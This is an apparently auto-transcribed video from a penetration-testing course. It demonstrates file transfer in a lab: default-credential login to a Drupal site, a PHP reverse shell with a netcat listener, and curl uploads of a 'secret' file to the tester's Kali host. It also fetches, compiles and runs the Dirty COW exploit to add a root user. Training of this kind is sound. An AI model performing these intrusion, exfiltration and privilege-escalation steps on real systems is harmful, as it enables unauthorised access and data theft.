Transferring Files Demo

Video Activity
Join over 3 million cybersecurity professionals advancing their career
Sign up with
Required fields are marked with an *
or

Already have an account? Sign In »

Time
21 hours 43 minutes
Difficulty
Intermediate
CEU/CPE
22
Video Transcription
00:01
Welcome to the file transfer lab demo. You can see I'm in a droop als site here. You can tell that because it's just powered by Drew Apple and also because a little dribble logo here. So sometimes it's as easy as guessing. So I'm going to do admin admin
00:17
and you can see I logged in as admin. Hello admin.
00:22
So what I want to do now, this is just getting to know content management systems. What I want to do with content is I want to add content
00:29
at a basic page.
00:31
I'm going to call this shell dot PHP
00:35
and I'm going to change this to PHP code
00:39
now. I need to figure out what shall I want to use. Well obviously we know it's PHP. You can see this is that said I was telling you about reb shells dot com.
00:48
I've already picked the pen test monkey show. I like this show.
00:52
And what you do is I've just added my I. P address and the port number.
00:56
It actually tells you what to do in your box here for the listener.
00:59
And I've changed my shell from the default been S. H. Two bin bash because I like bash shells better.
01:06
It's gonna copy this. I'm going to paste it here.
01:08
Yeah.
01:10
So what I need to get ready is I need to get a listener ready.
01:14
Net cat
01:15
An LEP 4444.
01:19
And we'll save this
01:23
and
01:26
we see if I hit preview.
01:30
Now I have my shell here. Dub dub, dub data. You can see this is no control job in shell. So let's have one to sue. Route.
01:40
It says must be run from a terminal. So now we know we have what I call a bad shell.
01:46
How do we make this a nicer shell?
01:49
So I told you about python, taxi, import P. T. Y.
01:53
Let's do that.
01:56
But you can see this has been S. H.
01:57
I like bash better but I'll show you what happens if you do Ben Shell.
02:01
So you just get the little dollar sign and not the nicer output.
02:06
You can of course change this
02:07
to bin bash
02:13
and there you go. Now if I wanted to sue route
02:16
now I asked me the password, obviously I don't know the root user's password.
02:21
Not yet.
02:23
So typically I'll go and figure out
02:27
who
02:29
who
02:30
is in here. And I see this Triple Pro which which users are in here I should say remember Cat at sea
02:38
at sea password.
02:40
And I see Drew Apple Pro.
02:43
So I'll change director to Drew People
02:46
Pro.
02:47
And then I'll see what files are in here. And I see this something called secret,
02:52
let's say when I get that file onto my Cali box,
02:57
what I'll do is I'll split my terminal vertically.
03:00
Mhm.
03:04
And I'm gonna use that simply should be put server. I told you I'll show you what it looks like a cat. It
03:13
it's a very small script. But I can now put things onto my Cali box. Whereas if I just did simple HDP server or HTTP server with python three, I can't put things onto my machine.
03:28
So let's do
03:30
python python two
03:34
And it's on 48,000.
03:36
So what I'll do on this size curl tete big t
03:42
secret
03:43
. And then my Cali box 1921681
03:50
228 8000.
03:53
And you can see that. I gotta crow request here.
03:58
And if I check my desktop
04:01
we can x. Out of here. Now
04:04
I see that I get secret
04:06
here.
04:09
So I put that on from from the dribble machine onto my machine with that server.
04:17
Now what I can do
04:21
is I can try to put a file from Cali onto this machine and if I do you name a, I see a kernel version and we'll talk about this morning in colonel exploits
04:34
but I know that this is vulnerable to dirty cow
04:38
as you can see already have dirty cow down here.
04:42
So typically what I do is go to the temp directory because I know it's globally readable, writable and execute Herbal
04:48
and I'll use curl http 1921681228 8000.
04:58
Remember this is on the desktop and dirty cows on the desktop. Dirty
05:02
cow dot c
05:05
output. Dirty
05:08
you can even whatever I want. Dirty see
05:12
and now I see to get requests on the right
05:15
and I see that that was downloaded.
05:18
So if I open this, I said I like to look at the comments.
05:24
It should tell me how to compile it. So I see here G ccP thread dirty. See output. Dirty.
05:32
So I'll try that here
05:42
and um ahmad plus X.
05:46
Dirty
05:49
and then I will
05:53
and our new password
05:57
and you can see it should have overwritten
06:00
the etc. Password file to have this fire fart user
06:05
in it as as the root user.
06:15
So some sometimes you'll notice that um, you may not get an output with these, these colonel exploits. There we go. Now we see something.
06:23
Yeah.
06:25
Great. So now we see that it's done check etc. Pastor to see if the new user was created.
06:30
So now I can do sue. Fire,
06:36
fire fart
06:41
and my password of fire.
06:44
And now we see I am the root user.
06:47
So that gives you some idea of how I both get files. I mean I showed you many examples. This is that was just one was setting up that simple http. Put server. But you saw how I could put files onto my machine.
07:01
You saw how I transferred from a bad shell where I couldn't use su
07:09
to using python and importing P. T. Y.
07:13
And then curling and getting the exploit onto the victim machine and ultimately being able to execute it and becoming the root user, which we'll talk about a lot more in the next module for privilege escalation. So I will see you for that.
Up Next